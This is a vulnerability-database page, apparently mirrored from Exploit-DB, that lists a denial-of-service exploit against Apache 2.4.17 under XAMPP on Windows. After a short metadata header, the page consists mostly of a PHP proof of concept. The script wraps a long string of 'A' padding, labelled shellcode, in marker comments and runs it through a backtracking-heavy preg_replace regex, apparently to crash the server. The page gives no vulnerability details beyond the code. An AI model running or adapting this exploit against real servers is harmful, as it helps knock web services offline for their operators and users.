Apache 2.4.17 - Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1066664 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/39037
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Apache 2.4.17 - Denial of Service
# Date: 17/12/2015
# Exploit Author: rUnVirus [ Ahmed Atif]
# Vendor Homepage: www.apache.org
# Software Link: https://www.apachefriends.org/download.html/
# Version: 5.5.30
# Tested on: windows 7 - XAMPP Version 5.5.30 (Apache 2.4.17 - PHP 5.5.30) 


<?php

$s="<?php

//!*runvirus:start*!";

$s2="!*runvirus:end*! ?>";


 
$shellcode= 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

";
 
$egg = $s.$shellcode.$s2;



$content = preg_replace(
  '%//!\*runvirus:start\*!(.)+!\*runvirus:end\*!%s',
  'test',
  $egg
);

echo 'If you can see this everything seems to be working fine.';

?>